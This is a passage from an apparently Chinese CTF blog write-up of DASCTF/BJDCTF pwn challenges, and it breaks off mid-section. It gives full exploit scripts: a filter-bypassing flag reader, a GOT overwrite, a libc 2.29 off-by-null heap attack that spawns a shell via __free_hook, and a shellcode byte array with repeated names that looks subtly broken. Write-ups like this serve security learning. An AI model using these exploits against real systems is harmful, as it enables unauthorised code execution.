

<!DOCTYPE html>
<html lang="zh-CN">
<head>
    
    <meta name="author" content="Lock">
    
    <meta name="description" content="菜鸡打比赛就是兴致满满打开网站—&amp;gt;下载附件，拖入IDA—&amp;gt;F5，眉头紧锁，冷静分析—&amp;gt;关闭网站，打开游戏，ctf什么的见鬼去吧
这次安恒月赛和bjdctf3rd梦幻联动，本着凑热闹的心态去打了一波，总共八个pwn，做了四个。。。艹，太菜了，下面记录并复现一下这次的赛题">
    
    

    
    <link rel="alternative" href="YOUR_RSS_ADDRESS" title="Lock&#39;s blog" type="application/atom+xml">
    
    
    

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>DASCTF五月赛&amp;BJDCTF | Lock&#39;s blog</title>

    <!-- Bootstrap -->
    
<link rel="stylesheet" href="/LawlietLW.github.io/bootstrap/css/bootstrap.min.css">

    
<link rel="stylesheet" href="/LawlietLW.github.io/css/style.css">


    <!-- Javascript -->
    <script src="/LawlietLW.github.io/js/jquery-2.1.0.min.js"></script>
    <script src="/LawlietLW.github.io/js/jquery.backstretch.min.js"></script>
    <script src="/LawlietLW.github.io/bootstrap/js/bootstrap.min.js"></script>
    <script src="/LawlietLW.github.io/js/headroom.min.js"></script>
    <script src="/LawlietLW.github.io/js/jquery.headroom.min.js"></script> 
    <script src="/LawlietLW.github.io/js/common.js"></script>

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
    <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
    <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->
<meta name="generator" content="Hexo 4.1.1"><link rel="stylesheet" href="/LawlietLW.github.io/css/prism-tomorrow.css" type="text/css"></head>
<body>
    <nav class="navbar navbar-default navbar-fixed-top navbar-inverse" role="banner">
        <div class="container">
            <div class="navbar-header">
                <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
                    <span class="sr-only">Toggle navigation</span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                    <span class="icon-bar"></span>
                </button>
                <a class="navbar-brand" href="http://LawlietLW.github.io" title="Lock's blog">Lock&#39;s blog</a>
            </div>

            <div role="navigation" class="collapse navbar-collapse bs-navbar-collapse">
                

                <ul class="nav navbar-nav">
                    
                    <li id="nav-index"><a href="/">首页</a></li>
                    
                    <li id="nav-archives"><a href="/archives">归档</a></li>
                    
                    <li id="nav-tags"><a href="/tags">标签</a></li>
                    
                    <li id="nav-categories"><a href="/categories">分类</a></li>
                    
                    <li id="nav-curriculumvitae"><a href="/curriculumvitae">关于</a></li>
                    
                    <li id="nav-links"><a href="/links">链接</a></li>
                    
                    
                    
                </ul>
            </div>
        </div>
    </nav>
    
    <script>
    var backRoot = "./themes/hexadillax/source/images/background";
    var backArray = [ "1.jpg", "2.jpg", "3.jpg",  ];
        
    $(function() {
        // page-id...
        var pageId = "2020/05/24/dasctf-wu-yue-sai-bjdctf/";
        pageId = pageId.substr(0, pageId.indexOf("/"));
        if(pageId === "") pageId = "index";
        
        $("#nav-" + pageId).addClass("active");
    });
    </script>

    <article class="post container">
    <div class="well post-body first-post last-post">
        <h1>DASCTF五月赛&BJDCTF</h1>
        
        <div class="time-info">
发表于:<time datetime="2020-05-24T06:41:11.000Z" itemprop="datePublished">2020-05-24</time>，更新于:<time datetime="2020-07-30T04:53:29.557Z" itemprop="dateModified">2020-07-30</time>，By <a href="http://LawlietLW.github.io" title="Lock">Lock</a>
        </div>
        
        <div class="post-body-inner">
            <div id="toc" class="toc-article well">
                <strong class="toc-title">大纲</strong>
                <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x1-OJ0"><span class="toc-number">1.</span> <span class="toc-text">0x1.OJ0</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x2-Memory-Monster-I"><span class="toc-number">2.</span> <span class="toc-text">0x2.Memory_Monster_I</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x3-happending"><span class="toc-number">3.</span> <span class="toc-text">0x3.happending</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x4-OJ1"><span class="toc-number">4.</span> <span class="toc-text">0x4.OJ1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x5-Memory-Monster-II"><span class="toc-number">5.</span> <span class="toc-text">0x5.Memory_Monster_II</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x6-Memory-Monster-III"><span class="toc-number">6.</span> <span class="toc-text">0x6.Memory Monster III</span></a></li></ol>
            </div>
            
            <p>菜鸡打比赛就是兴致满满打开网站—&gt;下载附件，拖入IDA—&gt;F5，眉头紧锁，冷静分析—&gt;关闭网站，打开游戏，ctf什么的见鬼去吧</p>
<p>这次安恒月赛和bjdctf3rd梦幻联动，本着凑热闹的心态去打了一波，总共八个pwn，做了四个。。。艹，太菜了，下面记录并复现一下这次的赛题</p>
<a id="more"></a>

<h2 id="0x1-OJ0"><a href="#0x1-OJ0" class="headerlink" title="0x1.OJ0"></a>0x1.OJ0</h2><p>这题没有附件，是个c语言编译器，能够编译并且执行我们输入的c代码，所以我们需要通过输入c代码来拿到flag，测试之后发现system被禁，然后想用orw读flag，flag这个词也被禁，所以需要拼接，但还是读不出来，后来经提醒，flag的目录为/home/ctf/flag，继续读取，发现这个路径也被禁了，于是继续拼接，成功读取，exp如下</p>
<pre class=" language-c"><code class="language-c"><span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span>
<span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;string.h></span></span>
<span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;unistd.h></span></span>
<span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;sys/stat.h></span></span>
<span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;fcntl.h></span></span>
<span class="token keyword">int</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">{</span>
    <span class="token keyword">char</span> s<span class="token punctuation">[</span><span class="token number">80</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">char</span> file<span class="token punctuation">[</span><span class="token number">30</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token function">strcpy</span><span class="token punctuation">(</span>file<span class="token punctuation">,</span><span class="token string">"/ho"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">strcat</span><span class="token punctuation">(</span>file<span class="token punctuation">,</span><span class="token string">"me/"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">strcat</span><span class="token punctuation">(</span>file<span class="token punctuation">,</span><span class="token string">"ct"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">strcat</span><span class="token punctuation">(</span>file<span class="token punctuation">,</span><span class="token string">"f/"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">strcat</span><span class="token punctuation">(</span>file<span class="token punctuation">,</span><span class="token string">"fl"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">strcat</span><span class="token punctuation">(</span>file<span class="token punctuation">,</span><span class="token string">"ag"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>    
    <span class="token keyword">int</span> fd<span class="token operator">=</span><span class="token function">open</span><span class="token punctuation">(</span>file<span class="token punctuation">,</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">read</span><span class="token punctuation">(</span>fd<span class="token punctuation">,</span>s<span class="token punctuation">,</span><span class="token number">0x30</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"%s"</span><span class="token punctuation">,</span>s<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span></code></pre>
<h2 id="0x2-Memory-Monster-I"><a href="#0x2-Memory-Monster-I" class="headerlink" title="0x2.Memory_Monster_I"></a>0x2.Memory_Monster_I</h2><p>这题是任意地址写，并没有exit函数，加上程序开启了canary，所以考虑修改__stack_chk_fail函数为程序中的后门函数，这样栈溢出就会执行后门函数，exp如下</p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>
context<span class="token punctuation">.</span>log_level<span class="token operator">=</span><span class="token string">'debug'</span>
<span class="token comment" spellcheck="true">#io=process('./Memory_Monster_I')</span>
io<span class="token operator">=</span>remote<span class="token punctuation">(</span><span class="token string">'183.129.189.60'</span><span class="token punctuation">,</span><span class="token number">10081</span><span class="token punctuation">)</span>
elf<span class="token operator">=</span>ELF<span class="token punctuation">(</span><span class="token string">'Memory_Monster_I'</span><span class="token punctuation">)</span>
__stack_chk_fail_got<span class="token operator">=</span>elf<span class="token punctuation">.</span>got<span class="token punctuation">[</span><span class="token string">'__stack_chk_fail'</span><span class="token punctuation">]</span>

payload<span class="token operator">=</span>p64<span class="token punctuation">(</span>__stack_chk_fail_got<span class="token punctuation">)</span>
payload<span class="token operator">=</span>payload<span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">0x30</span><span class="token punctuation">,</span><span class="token string">'\x00'</span><span class="token punctuation">)</span>

io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'addr:'</span><span class="token punctuation">)</span>
io<span class="token punctuation">.</span>send<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>
payload<span class="token operator">=</span>p64<span class="token punctuation">(</span><span class="token number">0x40124a</span><span class="token punctuation">)</span>
io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'data:'</span><span class="token punctuation">)</span>
io<span class="token punctuation">.</span>send<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>
io<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span></code></pre>
<h2 id="0x3-happending"><a href="#0x3-happending" class="headerlink" title="0x3.happending"></a>0x3.happending</h2><p>libc2.29的off-by-null，利用起来限制要多很多，而且这个题目存在off-by-null的功能还是add，难度就更大了，不过所谓前人栽树后人乘凉，有大师傅已经把利用方式总结好了，<a href="https://bbs.pediy.com/thread-257901.htm" target="_blank" rel="noopener">参考链接</a>,我就不做讲解了，直接贴exp了</p>
<pre class=" language-python"><code class="language-python"><span class="token comment" spellcheck="true">#!/usr/bin/python</span>
<span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>
context<span class="token punctuation">.</span>log_level <span class="token operator">=</span> <span class="token string">'debug'</span>
elf <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'x'</span><span class="token punctuation">)</span>
libc <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'libc.so.6'</span><span class="token punctuation">)</span>


<span class="token keyword">def</span> <span class="token function">add</span><span class="token punctuation">(</span>size<span class="token punctuation">,</span> content<span class="token punctuation">)</span><span class="token punctuation">:</span>
    io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'>'</span><span class="token punctuation">)</span>
    io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'1'</span><span class="token punctuation">)</span>
    io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">':'</span><span class="token punctuation">)</span>
    io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>str<span class="token punctuation">(</span>size<span class="token punctuation">)</span><span class="token punctuation">)</span>
    io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'!'</span><span class="token punctuation">)</span>
    io<span class="token punctuation">.</span>send<span class="token punctuation">(</span>content<span class="token punctuation">)</span>


<span class="token keyword">def</span> <span class="token function">delete</span><span class="token punctuation">(</span>index<span class="token punctuation">)</span><span class="token punctuation">:</span>
    io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'>'</span><span class="token punctuation">)</span>
    io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'2'</span><span class="token punctuation">)</span>
    io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">':'</span><span class="token punctuation">)</span>
    io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>str<span class="token punctuation">(</span>index<span class="token punctuation">)</span><span class="token punctuation">)</span>


<span class="token keyword">def</span> <span class="token function">show</span><span class="token punctuation">(</span>index<span class="token punctuation">)</span><span class="token punctuation">:</span>
    io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'>'</span><span class="token punctuation">)</span>
    io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'3'</span><span class="token punctuation">)</span>
    io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">':'</span><span class="token punctuation">)</span>
    io<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>str<span class="token punctuation">(</span>index<span class="token punctuation">)</span><span class="token punctuation">)</span>


<span class="token keyword">def</span> <span class="token function">pwn</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">for</span> i <span class="token keyword">in</span> range<span class="token punctuation">(</span><span class="token number">7</span><span class="token punctuation">)</span><span class="token punctuation">:</span>  <span class="token comment" spellcheck="true"># 0-6</span>
        add<span class="token punctuation">(</span><span class="token number">0x1000</span><span class="token punctuation">,</span> <span class="token string">"padding"</span><span class="token punctuation">)</span>

    add<span class="token punctuation">(</span><span class="token number">0x1000</span><span class="token operator">-</span><span class="token number">0x410</span><span class="token punctuation">,</span> <span class="token string">"padding"</span><span class="token punctuation">)</span>  <span class="token comment" spellcheck="true"># 7</span>

    <span class="token keyword">for</span> i <span class="token keyword">in</span> range<span class="token punctuation">(</span><span class="token number">7</span><span class="token punctuation">)</span><span class="token punctuation">:</span>  <span class="token comment" spellcheck="true"># 8-14</span>
        add<span class="token punctuation">(</span><span class="token number">0x28</span><span class="token punctuation">,</span> <span class="token string">'t'</span><span class="token punctuation">)</span>

    add<span class="token punctuation">(</span><span class="token number">0xb20</span><span class="token punctuation">,</span> <span class="token string">"largebin"</span><span class="token punctuation">)</span>  <span class="token comment" spellcheck="true"># 15</span>
    add<span class="token punctuation">(</span><span class="token number">0x10</span><span class="token punctuation">,</span> <span class="token string">"padding"</span><span class="token punctuation">)</span>  <span class="token comment" spellcheck="true"># 16</span>

    delete<span class="token punctuation">(</span><span class="token number">15</span><span class="token punctuation">)</span>
    add<span class="token punctuation">(</span><span class="token number">0x1000</span><span class="token punctuation">,</span> <span class="token string">'\n'</span><span class="token punctuation">)</span>  <span class="token comment" spellcheck="true"># chunk15 to largebin</span>

    add<span class="token punctuation">(</span><span class="token number">0x28</span><span class="token punctuation">,</span> p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span><span class="token number">0x521</span><span class="token punctuation">)</span> <span class="token operator">+</span> p8<span class="token punctuation">(</span><span class="token number">0x40</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

    add<span class="token punctuation">(</span><span class="token number">0x28</span><span class="token punctuation">,</span> <span class="token string">'a'</span><span class="token punctuation">)</span>  <span class="token comment" spellcheck="true"># 18</span>
    add<span class="token punctuation">(</span><span class="token number">0x28</span><span class="token punctuation">,</span> <span class="token string">'b'</span><span class="token punctuation">)</span>  <span class="token comment" spellcheck="true"># 19</span>
    add<span class="token punctuation">(</span><span class="token number">0x28</span><span class="token punctuation">,</span> <span class="token string">'c'</span><span class="token punctuation">)</span>  <span class="token comment" spellcheck="true"># 20</span>
    add<span class="token punctuation">(</span><span class="token number">0x28</span><span class="token punctuation">,</span> <span class="token string">'d'</span><span class="token punctuation">)</span>  <span class="token comment" spellcheck="true"># 21</span>

    <span class="token keyword">for</span> i <span class="token keyword">in</span> range<span class="token punctuation">(</span><span class="token number">7</span><span class="token punctuation">)</span><span class="token punctuation">:</span>  <span class="token comment" spellcheck="true"># 8-14</span>
        delete<span class="token punctuation">(</span><span class="token number">8</span> <span class="token operator">+</span> i<span class="token punctuation">)</span>

    delete<span class="token punctuation">(</span><span class="token number">20</span><span class="token punctuation">)</span>
    delete<span class="token punctuation">(</span><span class="token number">18</span><span class="token punctuation">)</span>

    <span class="token keyword">for</span> i <span class="token keyword">in</span> range<span class="token punctuation">(</span><span class="token number">7</span><span class="token punctuation">)</span><span class="token punctuation">:</span>  <span class="token comment" spellcheck="true"># 8-14</span>
        add<span class="token punctuation">(</span><span class="token number">0x28</span><span class="token punctuation">,</span> <span class="token string">'\n'</span><span class="token punctuation">)</span>

    add<span class="token punctuation">(</span><span class="token number">0x400</span><span class="token punctuation">,</span> <span class="token string">'\n'</span><span class="token punctuation">)</span>  <span class="token comment" spellcheck="true"># 18</span>


    add<span class="token punctuation">(</span><span class="token number">0x28</span><span class="token punctuation">,</span>  p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token operator">+</span> p8<span class="token punctuation">(</span><span class="token number">0x20</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token comment" spellcheck="true">#gdb.attach(io)</span>
    <span class="token comment" spellcheck="true"># gdb.attach(io)</span>

    add<span class="token punctuation">(</span><span class="token number">0x28</span><span class="token punctuation">,</span> <span class="token string">'clear'</span><span class="token punctuation">)</span>  <span class="token comment" spellcheck="true"># 21</span>

    <span class="token keyword">for</span> i <span class="token keyword">in</span> range<span class="token punctuation">(</span><span class="token number">7</span><span class="token punctuation">)</span><span class="token punctuation">:</span>  <span class="token comment" spellcheck="true"># 8-14</span>
        delete<span class="token punctuation">(</span><span class="token number">8</span> <span class="token operator">+</span> i<span class="token punctuation">)</span>

    delete<span class="token punctuation">(</span><span class="token number">19</span><span class="token punctuation">)</span>
    delete<span class="token punctuation">(</span><span class="token number">17</span><span class="token punctuation">)</span>

    <span class="token keyword">for</span> i <span class="token keyword">in</span> range<span class="token punctuation">(</span><span class="token number">7</span><span class="token punctuation">)</span><span class="token punctuation">:</span>  <span class="token comment" spellcheck="true"># 8-14</span>
        add<span class="token punctuation">(</span><span class="token number">0x28</span><span class="token punctuation">,</span> <span class="token string">'\n'</span><span class="token punctuation">)</span>

    add<span class="token punctuation">(</span><span class="token number">0x28</span><span class="token punctuation">,</span> p8<span class="token punctuation">(</span><span class="token number">0x20</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    add<span class="token punctuation">(</span><span class="token number">0x28</span><span class="token punctuation">,</span> <span class="token string">"clear"</span><span class="token punctuation">)</span>

    add<span class="token punctuation">(</span><span class="token number">0x28</span><span class="token punctuation">,</span> <span class="token string">"a"</span><span class="token punctuation">)</span>  <span class="token comment" spellcheck="true"># 23 overwrite</span>
    add<span class="token punctuation">(</span><span class="token number">0x5f8</span><span class="token punctuation">,</span> <span class="token string">"a"</span><span class="token punctuation">)</span>  <span class="token comment" spellcheck="true"># 24 trigger off-by-null</span>
    add<span class="token punctuation">(</span><span class="token number">0x100</span><span class="token punctuation">,</span> <span class="token string">"/bin/sh\x00"</span><span class="token punctuation">)</span>  <span class="token comment" spellcheck="true"># 25</span>

    delete<span class="token punctuation">(</span><span class="token number">23</span><span class="token punctuation">)</span>

    add<span class="token punctuation">(</span><span class="token number">0x28</span><span class="token punctuation">,</span> <span class="token string">"a"</span><span class="token operator">*</span><span class="token number">0x20</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span><span class="token number">0x520</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

    delete<span class="token punctuation">(</span><span class="token number">24</span><span class="token punctuation">)</span>

    add<span class="token punctuation">(</span><span class="token number">0x40</span><span class="token punctuation">,</span> <span class="token string">"a"</span><span class="token punctuation">)</span> <span class="token comment" spellcheck="true">#24</span>
    show<span class="token punctuation">(</span><span class="token number">19</span><span class="token punctuation">)</span>

    libc_base <span class="token operator">=</span> u64<span class="token punctuation">(</span>io<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">"\x7f"</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">6</span><span class="token punctuation">:</span><span class="token punctuation">]</span><span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span> <span class="token string">"\x00"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token operator">-</span><span class="token number">0x1e4ca0</span>
    log<span class="token punctuation">.</span>success<span class="token punctuation">(</span><span class="token string">'libc_base => {}'</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>hex<span class="token punctuation">(</span>libc_base<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    free_hook<span class="token operator">=</span>libc_base<span class="token operator">+</span>libc<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">'__free_hook'</span><span class="token punctuation">]</span>
    system_addr<span class="token operator">=</span>libc_base<span class="token operator">+</span>libc<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">'system'</span><span class="token punctuation">]</span>
    log<span class="token punctuation">.</span>success<span class="token punctuation">(</span><span class="token string">'free_hook => {}'</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>hex<span class="token punctuation">(</span>free_hook<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    log<span class="token punctuation">.</span>success<span class="token punctuation">(</span><span class="token string">'system => {}'</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>hex<span class="token punctuation">(</span>system_addr<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

    delete<span class="token punctuation">(</span><span class="token number">24</span><span class="token punctuation">)</span>

    delete<span class="token punctuation">(</span><span class="token number">17</span><span class="token punctuation">)</span>

    add<span class="token punctuation">(</span><span class="token number">0x28</span><span class="token punctuation">,</span><span class="token string">'\x00'</span><span class="token operator">*</span><span class="token number">8</span><span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0x51</span><span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>free_hook<span class="token punctuation">)</span><span class="token punctuation">)</span>
    add<span class="token punctuation">(</span><span class="token number">0x40</span><span class="token punctuation">,</span>p64<span class="token punctuation">(</span>free_hook<span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token comment" spellcheck="true">#gdb.attach(io)</span>
    add<span class="token punctuation">(</span><span class="token number">0x40</span><span class="token punctuation">,</span>p64<span class="token punctuation">(</span>system_addr<span class="token punctuation">)</span><span class="token punctuation">)</span>
    delete<span class="token punctuation">(</span><span class="token number">25</span><span class="token punctuation">)</span>
    io<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span>


<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">'__main__'</span><span class="token punctuation">:</span>
    <span class="token keyword">while</span> <span class="token boolean">True</span><span class="token punctuation">:</span>
        <span class="token keyword">try</span><span class="token punctuation">:</span>
            <span class="token comment" spellcheck="true">#io=process('./x')</span>
            io<span class="token operator">=</span>remote<span class="token punctuation">(</span><span class="token string">'183.129.189.60'</span><span class="token punctuation">,</span><span class="token number">10108</span><span class="token punctuation">)</span>
            pwn<span class="token punctuation">(</span><span class="token punctuation">)</span>
        <span class="token keyword">except</span><span class="token punctuation">:</span>
            io<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span></code></pre>
<h2 id="0x4-OJ1"><a href="#0x4-OJ1" class="headerlink" title="0x4.OJ1"></a>0x4.OJ1</h2><p>同样是c语言编译器，不过这题不允许出现括号，包括&lt;&gt;,(),{}，所以正常用c语言肯定不行，这种情况下有一种利用方式，就是将汇编语言的字节码作为输入，如下</p>
<pre class=" language-c"><code class="language-c"><span class="token keyword">const</span> <span class="token keyword">char</span> main <span class="token operator">=</span> <span class="token number">0x55</span><span class="token punctuation">,</span> main1 <span class="token operator">=</span> <span class="token number">0x48</span><span class="token punctuation">,</span> main2 <span class="token operator">=</span> <span class="token number">0x89</span><span class="token punctuation">,</span> main3 <span class="token operator">=</span> <span class="token number">0xe5</span><span class="token punctuation">,</span> main4 <span class="token operator">=</span> <span class="token number">0x48</span><span class="token punctuation">,</span>
           main5 <span class="token operator">=</span> <span class="token number">0x83</span><span class="token punctuation">,</span> main6 <span class="token operator">=</span> <span class="token number">0xec</span><span class="token punctuation">,</span> main7 <span class="token operator">=</span> <span class="token number">0x20</span><span class="token punctuation">,</span> main8 <span class="token operator">=</span> <span class="token number">0x48</span><span class="token punctuation">,</span> main9 <span class="token operator">=</span> <span class="token number">0xb8</span><span class="token punctuation">,</span>
           main10 <span class="token operator">=</span> <span class="token number">0x63</span><span class="token punctuation">,</span> main11 <span class="token operator">=</span> <span class="token number">0x61</span><span class="token punctuation">,</span> main12 <span class="token operator">=</span> <span class="token number">0x74</span><span class="token punctuation">,</span> main13 <span class="token operator">=</span> <span class="token number">0x20</span><span class="token punctuation">,</span>
           main14 <span class="token operator">=</span> <span class="token number">0x2f</span><span class="token punctuation">,</span> main15 <span class="token operator">=</span> <span class="token number">0x68</span><span class="token punctuation">,</span> main16 <span class="token operator">=</span> <span class="token number">0x6f</span><span class="token punctuation">,</span> main17 <span class="token operator">=</span> <span class="token number">0x6d</span><span class="token punctuation">,</span>
           main18 <span class="token operator">=</span> <span class="token number">0x48</span><span class="token punctuation">,</span> main19 <span class="token operator">=</span> <span class="token number">0x89</span><span class="token punctuation">,</span> main20 <span class="token operator">=</span> <span class="token number">0x45</span><span class="token punctuation">,</span> main21 <span class="token operator">=</span> <span class="token number">0xe0</span><span class="token punctuation">,</span>
           main22 <span class="token operator">=</span> <span class="token number">0x48</span><span class="token punctuation">,</span> main23 <span class="token operator">=</span> <span class="token number">0xb8</span><span class="token punctuation">,</span> main24 <span class="token operator">=</span> <span class="token number">0x65</span><span class="token punctuation">,</span> main25 <span class="token operator">=</span> <span class="token number">0x2f</span><span class="token punctuation">,</span>
       main26 <span class="token operator">=</span> <span class="token number">0x63</span><span class="token punctuation">,</span>main27 <span class="token operator">=</span> <span class="token number">0x74</span><span class="token punctuation">,</span>main28 <span class="token operator">=</span> <span class="token number">0x66</span><span class="token punctuation">,</span>main29 <span class="token operator">=</span> <span class="token number">0x2f</span><span class="token punctuation">,</span>
       main30 <span class="token operator">=</span> <span class="token number">0x66</span><span class="token punctuation">,</span>main31 <span class="token operator">=</span> <span class="token number">0x6c</span><span class="token punctuation">,</span>main32 <span class="token operator">=</span> <span class="token number">0x48</span><span class="token punctuation">,</span>main33 <span class="token operator">=</span> <span class="token number">0x89</span><span class="token punctuation">,</span>main34 <span class="token operator">=</span> <span class="token number">0x45</span><span class="token punctuation">,</span>
       main35 <span class="token operator">=</span> <span class="token number">0xe8</span><span class="token punctuation">,</span>main36 <span class="token operator">=</span> <span class="token number">0x66</span><span class="token punctuation">,</span>main37 <span class="token operator">=</span> <span class="token number">0xc7</span><span class="token punctuation">,</span>main38 <span class="token operator">=</span> <span class="token number">0x45</span><span class="token punctuation">,</span>main39 <span class="token operator">=</span> <span class="token number">0xf0</span><span class="token punctuation">,</span>
       main40 <span class="token operator">=</span> <span class="token number">0x61</span><span class="token punctuation">,</span>main41 <span class="token operator">=</span> <span class="token number">0x67</span><span class="token punctuation">,</span>main20 <span class="token operator">=</span> <span class="token number">0xc6</span><span class="token punctuation">,</span>main21 <span class="token operator">=</span> <span class="token number">0x45</span><span class="token punctuation">,</span>main22 <span class="token operator">=</span> <span class="token number">0xf2</span><span class="token punctuation">,</span>
       main23 <span class="token operator">=</span> <span class="token number">0x00</span><span class="token punctuation">,</span>main24 <span class="token operator">=</span> <span class="token number">0x48</span><span class="token punctuation">,</span>main25 <span class="token operator">=</span> <span class="token number">0x8d</span><span class="token punctuation">,</span>main26 <span class="token operator">=</span> <span class="token number">0x45</span><span class="token punctuation">,</span>main27 <span class="token operator">=</span> <span class="token number">0xe0</span><span class="token punctuation">,</span>
       main28 <span class="token operator">=</span> <span class="token number">0x48</span><span class="token punctuation">,</span>main29 <span class="token operator">=</span> <span class="token number">0x89</span><span class="token punctuation">,</span>main30 <span class="token operator">=</span> <span class="token number">0xc7</span><span class="token punctuation">,</span>main31 <span class="token operator">=</span> <span class="token number">0xe8</span><span class="token punctuation">,</span>main32 <span class="token operator">=</span> <span class="token number">0xa0</span><span class="token punctuation">,</span>
       main33 <span class="token operator">=</span> <span class="token number">0xfe</span><span class="token punctuation">,</span>main34 <span class="token operator">=</span> <span class="token number">0xff</span><span class="token punctuation">,</span>main35 <span class="token operator">=</span> <span class="token number">0xff</span><span class="token punctuation">,</span>main36 <span class="token operator">=</span> <span class="token number">0xb8</span><span class="token punctuation">,</span>main37 <span class="token operator">=</span> <span class="token number">0x00</span><span class="token punctuation">,</span>
       main38 <span class="token operator">=</span> <span class="token number">0x00</span><span class="token punctuation">,</span>main39 <span class="token operator">=</span> <span class="token number">0x00</span><span class="token punctuation">,</span>main40 <span class="token operator">=</span> <span class="token number">0x00</span><span class="token punctuation">,</span>main41 <span class="token operator">=</span> <span class="token number">0xc9</span><span class="token punctuation">,</span>main42 <span class="token operator">=</span> <span class="token number">0xc3</span><span class="token punctuation">;</span>@</code></pre>
<p>这以坨代码变成c代码如下</p>
<pre class=" language-c"><code class="language-c"><span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span>
<span class="token macro property">#<span class="token directive keyword">include</span> <span class="token string">&lt;stdlib.h></span></span>
